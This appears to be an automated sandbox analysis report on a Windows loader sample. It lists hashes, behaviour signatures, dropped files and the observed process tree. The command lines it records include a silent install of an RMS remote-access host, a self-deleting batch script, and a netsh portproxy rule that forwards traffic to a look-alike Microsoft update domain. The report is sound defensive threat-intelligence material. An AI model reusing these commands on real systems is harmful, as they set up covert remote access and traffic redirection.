Resubmissions

29-12-2021 11:50

211229-nz3vsaddbl 8

29-12-2021 11:29

211229-nlssnaddak 10

28-12-2021 17:00

211228-vh1sescfan 10

Analysis

  • max time kernel
    113s
  • max time network
    111s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    29-12-2021 11:29

General

  • Target

    tmp/fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe

  • Size

    397KB

  • MD5

    aff57ee1a4f3731c2036046910f78fb4

  • SHA1

    ef9627c0cadff85a3dfaab6aef0b7c885f03b186

  • SHA256

    3826953ded758361f9783d67242e4ba87092d637d72bcf81c649e52665c57de4

  • SHA512

    5ae93c6dae61782a7ac2fa2079df7006e0655d73e32fd7df1a5c1d44e47fd7dd2da225ea6f93e9d3dcb09be5f84b5dab2130bb4f2d5b0e05d95e866ebde0163f

Malware Config

Signatures

  • RMS

    Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 9 IoCs
  • Sets file execution options in registry 2 TTPs
  • Loads dropped DLL 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Modifies WinLogon 2 TTPs 3 IoCs
  • Modifies powershell logging option 1 TTPs
  • Drops file in Program Files directory 53 IoCs
  • Drops file in Windows directory 21 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Gathers network information 2 TTPs 3 IoCs

    Uses commandline utility to view network configuration.

  • Modifies data under HKEY_USERS 5 IoCs
  • Modifies registry class 24 IoCs
  • Suspicious behavior: EnumeratesProcesses 38 IoCs
  • Suspicious behavior: SetClipboardViewer 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 57 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\tmp\fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe
    "C:\Users\Admin\AppData\Local\Temp\tmp\fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe"
    1⤵
    • Modifies WinLogon
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3160
    • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cxum69oc.cmdline"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2280
      • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES440B.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC440A.tmp"
        3⤵
          PID:964
      • C:\Windows\system32\chcp.com
        "C:\Windows\system32\chcp.com" 437
        2⤵
          PID:996
        • C:\Windows\system32\netsh.exe
          "C:\Windows\system32\netsh.exe" interface portproxy show all
          2⤵
            PID:3168
          • C:\Windows\system32\NETSTAT.EXE
            "C:\Windows\system32\NETSTAT.EXE" -na
            2⤵
            • Gathers network information
            • Suspicious use of AdjustPrivilegeToken
            PID:1252
          • C:\Windows\system32\NETSTAT.EXE
            "C:\Windows\system32\NETSTAT.EXE" -na
            2⤵
            • Gathers network information
            • Suspicious use of AdjustPrivilegeToken
            PID:3860
          • C:\Windows\system32\NETSTAT.EXE
            "C:\Windows\system32\NETSTAT.EXE" -na
            2⤵
            • Gathers network information
            • Suspicious use of AdjustPrivilegeToken
            PID:980
          • C:\Windows\system32\netsh.exe
            "C:\Windows\system32\netsh.exe" interface portproxy reset
            2⤵
              PID:1048
            • C:\Windows\system32\netsh.exe
              "C:\Windows\system32\netsh.exe" interface portproxy show all
              2⤵
                PID:2440
              • C:\Windows\system32\netsh.exe
                "C:\Windows\system32\netsh.exe" interface portproxy add v4tov4 listenport=757 connectport=443 connectaddress=msupdate.info
                2⤵
                  PID:3720
                • C:\Windows\system32\netsh.exe
                  "C:\Windows\system32\netsh.exe" interface portproxy show all
                  2⤵
                    PID:3116
                  • C:\Windows\system32\netsh.exe
                    "C:\Windows\system32\netsh.exe" interface portproxy show all
                    2⤵
                      PID:68
                    • C:\Users\Admin\AppData\Local\Temp\tmp\RMS.exe
                      "C:\Users\Admin\AppData\Local\Temp\tmp\RMS.exe"
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of WriteProcessMemory
                      PID:2260
                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\installer.exe
                        "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\installer.exe" /rsetup
                        3⤵
                        • Executes dropped EXE
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of SetWindowsHookEx
                        • Suspicious use of WriteProcessMemory
                        PID:1940
                        • C:\Windows\SysWOW64\msiexec.exe
                          "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\rms.host6.3ru_mod.msi" /qn
                          4⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1320
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\killself.bat
                          4⤵
                            PID:1360
                    • C:\Windows\system32\msiexec.exe
                      C:\Windows\system32\msiexec.exe /V
                      1⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:440
                    • C:\Windows\system32\msiexec.exe
                      C:\Windows\system32\msiexec.exe /V
                      1⤵
                      • Blocklisted process makes network request
                      • Enumerates connected drives
                      • Drops file in Program Files directory
                      • Drops file in Windows directory
                      • Modifies data under HKEY_USERS
                      • Modifies registry class
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:2616
                      • C:\Windows\syswow64\MsiExec.exe
                        C:\Windows\syswow64\MsiExec.exe -Embedding F364BD36C0883B21D73DBA3BFA659B77
                        2⤵
                        • Loads dropped DLL
                        PID:2144
                      • C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe
                        "C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe" /silentinstall
                        2⤵
                        • Executes dropped EXE
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of SetWindowsHookEx
                        PID:308
                      • C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe
                        "C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe" /firewall
                        2⤵
                        • Executes dropped EXE
                        • Modifies data under HKEY_USERS
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of SetWindowsHookEx
                        PID:3168
                      • C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe
                        "C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe" /start
                        2⤵
                        • Executes dropped EXE
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of SetWindowsHookEx
                        PID:1064
                    • C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe
                      "C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe"
                      1⤵
                      • Executes dropped EXE
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of SetWindowsHookEx
                      • Suspicious use of WriteProcessMemory
                      PID:1124
                      • C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe
                        "C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe" /tray
                        2⤵
                        • Executes dropped EXE
                        PID:2176
                      • C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe
                        "C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of WriteProcessMemory
                        PID:2520
                        • C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe
                          "C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe" /tray
                          3⤵
                          • Executes dropped EXE
                          • Suspicious behavior: SetClipboardViewer
                          PID:2168
                    • C:\Windows\system32\compattelrunner.exe
                      C:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW
                      1⤵
                        PID:3460

                      Network

                      MITRE ATT&CK Enterprise v6

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • C:\Program Files (x86)\Remote Manipulator System - Host\English.lg

                        MD5

                        bc25377ade68750b834c81fa71c233b8

                        SHA1

                        84dbb465dd2125f47668e2508e18af9bd6db2fd8

                        SHA256

                        9a48a7ea7ba2c2f33280d1e1722ebbc59bf81bc6c5a1f97edca53ea641ffd8e3

                        SHA512

                        205ab195339d7108adbe6dfabd48e4e21c5956ded587d7213a44618f0d34a43f7b8abaa7765b9d31695efacfc44beeb69fbaa3cb27c141b6a653713fdf5ebce5

                      • C:\Program Files (x86)\Remote Manipulator System - Host\RIPCServer.dll

                        MD5

                        2ddfa39f5c2fd3f00681ef2970617e4b

                        SHA1

                        8152aa18afbacf398b92168995ec8696d3fe3659

                        SHA256

                        f938bdc741ef1d2738b532aef001a160e3a3627ed8a27158b7017ee49fc65791

                        SHA512

                        f89f0f02cda650c138e4ebaef198f0762dfd571ef7d46a6b3710cd93d76bc52a79055c55afca46128a9a84a795a5cb946ca93c492e07cfb503c9b27d96211e20

                      • C:\Program Files (x86)\Remote Manipulator System - Host\RWLN.dll

                        MD5

                        3d0b27b3f8aa22575aa0faf0b2d67216

                        SHA1

                        39fc787538849692ed7352418616f467b7a86a1d

                        SHA256

                        d7782488ef29bf0fd7e8faf0bd24414a6540bf7366434692a5a485d5ae2d7d44

                        SHA512

                        19f0785d3cecce0dbbb7da1be640bffebe4daedc65a513d1db0b5e533eb96aaa0588831de74c88e5013c00405e03ca4188c4b633e39e6c49ab5c1d1b42191ca8

                      • C:\Program Files (x86)\Remote Manipulator System - Host\Russian.lg

                        MD5

                        e44e34bc285b709f08f967325d9c8be1

                        SHA1

                        e73f05c6a980ec9d006930c5343955f89579b409

                        SHA256

                        1d99a7b5f7b3daa61fa773972b1e335aa09b92411484f6ddc99d2b2894455a5b

                        SHA512

                        576b292b6e9cf022822443e050994462a6cbd9a3c60063bae9f54c78a84e75e17bb5eddf7e259a22a9d93f757cb6536c503762e2a30e75091e40c2756cde8727

                      • C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe

                        MD5

                        76ebe5fd077a62161d0ab560208b9f94

                        SHA1

                        614c218d35ba531f0bad791d52e5dcf57df5c742

                        SHA256

                        f0a653463850ce111457513e9ad3ec4443ed88c69fdf33d76e05c33ce8e1722b

                        SHA512

                        baba7b03042c4bfbf6efa9c2219ed72e393e193ee743a32501e1a5df56293b3bdf2270b92843c9333049dcfcfe52007d6e9a7bfaa0548ef268d2511cf590efde

                      • C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe

                        MD5

                        76ebe5fd077a62161d0ab560208b9f94

                        SHA1

                        614c218d35ba531f0bad791d52e5dcf57df5c742

                        SHA256

                        f0a653463850ce111457513e9ad3ec4443ed88c69fdf33d76e05c33ce8e1722b

                        SHA512

                        baba7b03042c4bfbf6efa9c2219ed72e393e193ee743a32501e1a5df56293b3bdf2270b92843c9333049dcfcfe52007d6e9a7bfaa0548ef268d2511cf590efde

                      • C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe

                        MD5

                        76ebe5fd077a62161d0ab560208b9f94

                        SHA1

                        614c218d35ba531f0bad791d52e5dcf57df5c742

                        SHA256

                        f0a653463850ce111457513e9ad3ec4443ed88c69fdf33d76e05c33ce8e1722b

                        SHA512

                        baba7b03042c4bfbf6efa9c2219ed72e393e193ee743a32501e1a5df56293b3bdf2270b92843c9333049dcfcfe52007d6e9a7bfaa0548ef268d2511cf590efde

                      • C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe

                        MD5

                        76ebe5fd077a62161d0ab560208b9f94

                        SHA1

                        614c218d35ba531f0bad791d52e5dcf57df5c742

                        SHA256

                        f0a653463850ce111457513e9ad3ec4443ed88c69fdf33d76e05c33ce8e1722b

                        SHA512

                        baba7b03042c4bfbf6efa9c2219ed72e393e193ee743a32501e1a5df56293b3bdf2270b92843c9333049dcfcfe52007d6e9a7bfaa0548ef268d2511cf590efde

                      • C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe

                        MD5

                        c9704931d887685d96ce92d637d84045

                        SHA1

                        0875a71e9118ded121d92f3f46a3af1ec8380f8b

                        SHA256

                        0448c45cb43585409002e01ef53442cb9f6ad58f211f5deb3ad2ca8b8d535826

                        SHA512

                        3b739394f69ec9f26ef607a0d481f1ad3d107462220c2281cbc300f16886ab3d857bee9af59b8857c7e7ae5b04e6a849eaa5e304d6935957a0a15e462375c260

                      • C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe

                        MD5

                        c9704931d887685d96ce92d637d84045

                        SHA1

                        0875a71e9118ded121d92f3f46a3af1ec8380f8b

                        SHA256

                        0448c45cb43585409002e01ef53442cb9f6ad58f211f5deb3ad2ca8b8d535826

                        SHA512

                        3b739394f69ec9f26ef607a0d481f1ad3d107462220c2281cbc300f16886ab3d857bee9af59b8857c7e7ae5b04e6a849eaa5e304d6935957a0a15e462375c260

                      • C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe

                        MD5

                        c9704931d887685d96ce92d637d84045

                        SHA1

                        0875a71e9118ded121d92f3f46a3af1ec8380f8b

                        SHA256

                        0448c45cb43585409002e01ef53442cb9f6ad58f211f5deb3ad2ca8b8d535826

                        SHA512

                        3b739394f69ec9f26ef607a0d481f1ad3d107462220c2281cbc300f16886ab3d857bee9af59b8857c7e7ae5b04e6a849eaa5e304d6935957a0a15e462375c260

                      • C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe

                        MD5

                        c9704931d887685d96ce92d637d84045

                        SHA1

                        0875a71e9118ded121d92f3f46a3af1ec8380f8b

                        SHA256

                        0448c45cb43585409002e01ef53442cb9f6ad58f211f5deb3ad2ca8b8d535826

                        SHA512

                        3b739394f69ec9f26ef607a0d481f1ad3d107462220c2281cbc300f16886ab3d857bee9af59b8857c7e7ae5b04e6a849eaa5e304d6935957a0a15e462375c260

                      • C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe

                        MD5

                        c9704931d887685d96ce92d637d84045

                        SHA1

                        0875a71e9118ded121d92f3f46a3af1ec8380f8b

                        SHA256

                        0448c45cb43585409002e01ef53442cb9f6ad58f211f5deb3ad2ca8b8d535826

                        SHA512

                        3b739394f69ec9f26ef607a0d481f1ad3d107462220c2281cbc300f16886ab3d857bee9af59b8857c7e7ae5b04e6a849eaa5e304d6935957a0a15e462375c260

                      • C:\Program Files (x86)\Remote Manipulator System - Host\vp8decoder.dll

                        MD5

                        292a1748850d1fdc91d4ec23b02d6902

                        SHA1

                        8f15f1c24e11c0b45b19c82a78f7b79b1e7f932d

                        SHA256

                        acf354ad6ed94e876b29a60c5870dd91e7b3f76cc82c1a862c92024a12404a9f

                        SHA512

                        cf7579f1169ec21d9bf3c666d416d3fe2a4f9953d4d328b182452e40043f91055d301fd4b4a21454b847dbdb0af6a61c52657caded7d6fd7e88812aceeacf704

                      • C:\Program Files (x86)\Remote Manipulator System - Host\vp8encoder.dll

                        MD5

                        4570f7a40357016c97afe0dd4faf749b

                        SHA1

                        ebc8a1660f1103c655559caab3a70ec23ca187f1

                        SHA256

                        a5f008bf852d4c73e001f840d6f8b233c7d9bc9570cee639d40c1c8723bf99f8

                        SHA512

                        6b16979d004adc04259f2ce043cde6f7b57f2ddf5f4cea7bb390fd6b9fb273d22355b837f1b5c2eae77ea7df792de8e6db43e31d7246f044935a8187dace493b

                      • C:\Program Files (x86)\Remote Manipulator System - Host\webmmux.dll

                        MD5

                        038bf9f3a58560ad1130eeb85cdc1a87

                        SHA1

                        3571eb7293a2a3a5bf6eb21e1569cd151d995d1a

                        SHA256

                        d247afa3bd1ccc18e11eb099280802a61d3792a2018c476d95debf2091e9707d

                        SHA512

                        8ffa52b358841600b9122974079d22d4e11bc4214316cd85ac4d4af0e369112b6827029f74a9a9d3918db00c7fed3a9a1985e0b43da39783a748d78752ae2385

                      • C:\Program Files (x86)\Remote Manipulator System - Host\webmvorbisdecoder.dll

                        MD5

                        eeb2c52abbc7eb1c029b7fec45a7f22e

                        SHA1

                        8bfeb412614e3db0a2bf0122f4d68cc27b8c3a61

                        SHA256

                        c0f0b84d587066af8f80f41a7be63b4c01547af3f1e011602ac1b6ee0ac54a2c

                        SHA512

                        0b5b83335c6f602b8397a3c2ae6d1e661d744eb27114463d53e344bf18774ccb38853d314ebe05536d4c28c29fe3fdaba041a6a46983789f064ca70881cfcb85

                      • C:\Program Files (x86)\Remote Manipulator System - Host\webmvorbisencoder.dll

                        MD5

                        e38372f576d927f525ef8e1a34b54664

                        SHA1

                        26af9d1db0a3f91d7fe13147e55f06c302d59389

                        SHA256

                        4046bd0b93909a41d0fd96f0405a864c79a47f493165546569251c1f73db6b0b

                        SHA512

                        78b7477b000407990304ec37624b873514d4ed9daa1b42fd988707b7374ffab442ba28fe19884724867f3f0f7a5f12f7fc8c228c050115c902d1569e4a3b13c7

                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\installer.exe

                        MD5

                        c9704931d887685d96ce92d637d84045

                        SHA1

                        0875a71e9118ded121d92f3f46a3af1ec8380f8b

                        SHA256

                        0448c45cb43585409002e01ef53442cb9f6ad58f211f5deb3ad2ca8b8d535826

                        SHA512

                        3b739394f69ec9f26ef607a0d481f1ad3d107462220c2281cbc300f16886ab3d857bee9af59b8857c7e7ae5b04e6a849eaa5e304d6935957a0a15e462375c260

                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\installer.exe

                        MD5

                        c9704931d887685d96ce92d637d84045

                        SHA1

                        0875a71e9118ded121d92f3f46a3af1ec8380f8b

                        SHA256

                        0448c45cb43585409002e01ef53442cb9f6ad58f211f5deb3ad2ca8b8d535826

                        SHA512

                        3b739394f69ec9f26ef607a0d481f1ad3d107462220c2281cbc300f16886ab3d857bee9af59b8857c7e7ae5b04e6a849eaa5e304d6935957a0a15e462375c260

                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\rms.host6.3ru_mod.msi

                        MD5

                        73e578a44265558d3ace212869d43cbb

                        SHA1

                        d2c15578def8996ed0ae4a44754055b774b095a7

                        SHA256

                        8a6945ead42d78d963d6f2e126eebb89c0e82b02c389d4badcaa837ff49bf7f4

                        SHA512

                        fe661e19899a6f749a180e5b312fcebb2963acc92720d1c6cabba22b0ffd250f1930c9dac62f789cd4b99aff86ef0f3944ae52a583e2c1be57c9fca391be9bf4

                      • C:\Users\Admin\AppData\Local\Temp\RES440B.tmp

                        MD5

                        070edbfaab3d2bf0a7d5cb55ead3d55c

                        SHA1

                        7d08bd39a3e2b7be84c644956a573297cebc8c80

                        SHA256

                        696c67f605b7bdd5c8b019f348d1b877611b7f6569e7ba8cb0d916c355a75d80

                        SHA512

                        1a536cbaa5c7e233a2244c105fdd0280c6982d4a5b46e05be2e681aebe997bd3ee0fb8e8fde10c4877fd12c9ede07074845aeb45e9667edc7a0722f83b8154f0

                      • C:\Users\Admin\AppData\Local\Temp\cxum69oc.dll

                        MD5

                        84f3fd91b53626545aae293e424e9b27

                        SHA1

                        046c481728520fb44a68e8680caea9204007718c

                        SHA256

                        94b08b6b83a18e192fcdeb4ee1c8d99ac9b70190f89b287680c8f71a86eb2591

                        SHA512

                        feee497f69472a53b7e0b61a9dd5138e45da8435bebdd25c756e1390dabe099637ed163ba4bda41e8e77be895474a761d08a6111ff000f5b4a398f5106da48d3

                      • C:\Users\Admin\AppData\Local\Temp\cxum69oc.pdb

                        MD5

                        60a2e322e157bcca475f39b80273647c

                        SHA1

                        27fbe035de965e4d4d269ece2b99303220796da7

                        SHA256

                        cd3984a4535d50ecafb5760aa6b018a2b3c1cb4c6c2ef5b3917f569827a1368f

                        SHA512

                        2dd2b0f238bc72574c528ef71090cdc928df84cf4e38388fc25ff0b15d9fd62741b18a3c48c8d7868785eae47864e429eea9ed46c46c338b55e43d2cc947677f

                      • C:\Users\Admin\AppData\Local\Temp\killself.bat

                        MD5

                        c2ac85b000427a4a00f19da237aaaf86

                        SHA1

                        459ecb5e64576348e6c654724e87825772c06ea8

                        SHA256

                        b5157eceaf9b5f6448d15dcfe7011af0b44a4288f7667c5d717f042c2fba1352

                        SHA512

                        e62f711445398b0654e698c4f7d4c75bb8693e901ae99f1cf543f45ccd9532daf27bba1ceb9d180d0379a41c9a62d6ee2df30cd25b9abb05532c551a0fad814b

                      • C:\Users\Admin\AppData\Local\Temp\tmp\RMS.exe

                        MD5

                        73f351beae5c881fafe36f42cde9a47c

                        SHA1

                        dc1425cfd5569bd59f5d56432df875b59da9300b

                        SHA256

                        a028816d9741540c6184091b4ae3c4e42b104f90fe3b17a55d0e4aa4c4c43824

                        SHA512

                        f484b1260e73b3717603cfcfd62e820502480d8be57a7570e6c38612c9ea86b9335c6a42742fbdb369a37fcd5ec4c2b06f426a075582c39639128ad7be92da66

                      • C:\Users\Admin\AppData\Local\Temp\tmp\RMS.exe

                        MD5

                        73f351beae5c881fafe36f42cde9a47c

                        SHA1

                        dc1425cfd5569bd59f5d56432df875b59da9300b

                        SHA256

                        a028816d9741540c6184091b4ae3c4e42b104f90fe3b17a55d0e4aa4c4c43824

                        SHA512

                        f484b1260e73b3717603cfcfd62e820502480d8be57a7570e6c38612c9ea86b9335c6a42742fbdb369a37fcd5ec4c2b06f426a075582c39639128ad7be92da66

                      • C:\Windows\Installer\MSI382E.tmp

                        MD5

                        b0bcc622f1fff0eec99e487fa1a4ddd9

                        SHA1

                        49aa392454bd5869fa23794196aedc38e8eea6f5

                        SHA256

                        b32687eaaad888410718875dcbff9f6a552e29c4d76af33e06e59859e1054081

                        SHA512

                        1572c1d07df2e9262d05a915d69ec4ebeb92eab50b89ce27dd290fb5a8e1de2c97d9320a3bb006834c98b3f6afcd7d2c29f039d9ca9afaa09c714406dedbc3c7

                      • \??\PIPE\wkssvc

                        MD5

                        d41d8cd98f00b204e9800998ecf8427e

                        SHA1

                        da39a3ee5e6b4b0d3255bfef95601890afd80709

                        SHA256

                        e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                        SHA512

                        cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                      • \??\c:\Users\Admin\AppData\Local\Temp\CSC440A.tmp

                        MD5

                        72cb6c3b10d2f6c7e2188d9ddf6c601d

                        SHA1

                        3c64773c8190b860fde4a39690a03472c376f2a2

                        SHA256

                        e77faa69a068d60ed955ec93c365e7363568a7c0e48333d5e8b208a84dd02a87

                        SHA512

                        76bd71a7ed80eac038897c45c3982cd18ed34c130b1b191c333ab068b86ad23f6d306c37b0cc4e6a207ed8dfdfe2366a76fdff4d3759f8432c1b329412d82f3b

                      • \??\c:\Users\Admin\AppData\Local\Temp\cxum69oc.0.cs

                        MD5

                        1640a04633fee0dfdc7e22c4f4063bf6

                        SHA1

                        3cb525c47b5dd37f8ee45b034c9452265fba5476

                        SHA256

                        55e16d2ca3e65ce6c62cd5be2af5d7264445c5d7e1b5f3be7149acfb47ae42a0

                        SHA512

                        85c5103dda738d6003d39b0b619e68942965ddb9d6e08e544abf377224fdb29c6cd1501a549e99e57875954cea44b5bdefd7cace018c8123e7bfb717ae0e973d

                      • \??\c:\Users\Admin\AppData\Local\Temp\cxum69oc.cmdline

                        MD5

                        0a2da3010eb7ba0d7bc059f58d48f833

                        SHA1

                        d12d06c34668951b9ce8345b6b8e15e590e3f3f5

                        SHA256

                        d57e487035ae1a703237b6e3630d40c5f750146adcc623f30d1354f20a2eba33

                        SHA512

                        3f462120514562ebe35c381eb274e4d09c1439f8cb4453ae362b3cdfc7f3dd8410eb9a3322786756fbba4fed0aa437284f27f094217a5b70353c5c1977aa40c9

                      • \Windows\Installer\MSI382E.tmp

                        MD5

                        b0bcc622f1fff0eec99e487fa1a4ddd9

                        SHA1

                        49aa392454bd5869fa23794196aedc38e8eea6f5

                        SHA256

                        b32687eaaad888410718875dcbff9f6a552e29c4d76af33e06e59859e1054081

                        SHA512

                        1572c1d07df2e9262d05a915d69ec4ebeb92eab50b89ce27dd290fb5a8e1de2c97d9320a3bb006834c98b3f6afcd7d2c29f039d9ca9afaa09c714406dedbc3c7

                      • memory/68-137-0x0000000000000000-mapping.dmp

                      • memory/308-161-0x0000000002680000-0x0000000002681000-memory.dmp

                        Filesize

                        4KB

                      • memory/308-158-0x0000000000000000-mapping.dmp

                      • memory/440-127-0x00000213CBF90000-0x00000213CBF92000-memory.dmp

                        Filesize

                        8KB

                      • memory/440-128-0x00000213CBF90000-0x00000213CBF92000-memory.dmp

                        Filesize

                        8KB

                      • memory/964-120-0x0000000000000000-mapping.dmp

                      • memory/980-132-0x0000000000000000-mapping.dmp

                      • memory/996-125-0x0000000000000000-mapping.dmp

                      • memory/1048-133-0x0000000000000000-mapping.dmp

                      • memory/1064-169-0x0000000000B40000-0x0000000000B41000-memory.dmp

                        Filesize

                        4KB

                      • memory/1064-164-0x0000000000000000-mapping.dmp

                      • memory/1124-170-0x00000000001D0000-0x00000000001F3000-memory.dmp

                        Filesize

                        140KB

                      • memory/1252-130-0x0000000000000000-mapping.dmp

                      • memory/1320-148-0x0000000000E00000-0x0000000000E01000-memory.dmp

                        Filesize

                        4KB

                      • memory/1320-146-0x0000000000000000-mapping.dmp

                      • memory/1320-147-0x0000000000E00000-0x0000000000E01000-memory.dmp

                        Filesize

                        4KB

                      • memory/1360-167-0x0000000000000000-mapping.dmp

                      • memory/1940-145-0x0000000000B00000-0x0000000000B01000-memory.dmp

                        Filesize

                        4KB

                      • memory/1940-142-0x0000000000000000-mapping.dmp

                      • memory/2144-154-0x0000000000470000-0x0000000000471000-memory.dmp

                        Filesize

                        4KB

                      • memory/2144-155-0x0000000000470000-0x0000000000471000-memory.dmp

                        Filesize

                        4KB

                      • memory/2144-153-0x0000000000000000-mapping.dmp

                      • memory/2168-188-0x0000000000000000-mapping.dmp

                      • memory/2168-190-0x0000000000B20000-0x0000000000B21000-memory.dmp

                        Filesize

                        4KB

                      • memory/2176-186-0x0000000002700000-0x0000000002701000-memory.dmp

                        Filesize

                        4KB

                      • memory/2176-181-0x0000000000000000-mapping.dmp

                      • memory/2260-139-0x0000000000000000-mapping.dmp

                      • memory/2280-117-0x0000000000000000-mapping.dmp

                      • memory/2280-126-0x0000000000930000-0x0000000000932000-memory.dmp

                        Filesize

                        8KB

                      • memory/2440-134-0x0000000000000000-mapping.dmp

                      • memory/2520-187-0x00000000025C0000-0x00000000025C1000-memory.dmp

                        Filesize

                        4KB

                      • memory/2520-182-0x0000000000000000-mapping.dmp

                      • memory/2616-151-0x000002561C240000-0x000002561C242000-memory.dmp

                        Filesize

                        8KB

                      • memory/2616-152-0x000002561C240000-0x000002561C242000-memory.dmp

                        Filesize

                        8KB

                      • memory/3116-136-0x0000000000000000-mapping.dmp

                      • memory/3160-116-0x00007FFE21F40000-0x00007FFE22A9D000-memory.dmp

                        Filesize

                        11.4MB

                      • memory/3160-138-0x0000000002846000-0x0000000002848000-memory.dmp

                        Filesize

                        8KB

                      • memory/3160-115-0x0000000002840000-0x0000000002842000-memory.dmp

                        Filesize

                        8KB

                      • memory/3168-129-0x0000000000000000-mapping.dmp

                      • memory/3168-168-0x0000000000C50000-0x0000000000C51000-memory.dmp

                        Filesize

                        4KB

                      • memory/3168-162-0x0000000000000000-mapping.dmp

                      • memory/3720-135-0x0000000000000000-mapping.dmp

                      • memory/3860-131-0x0000000000000000-mapping.dmp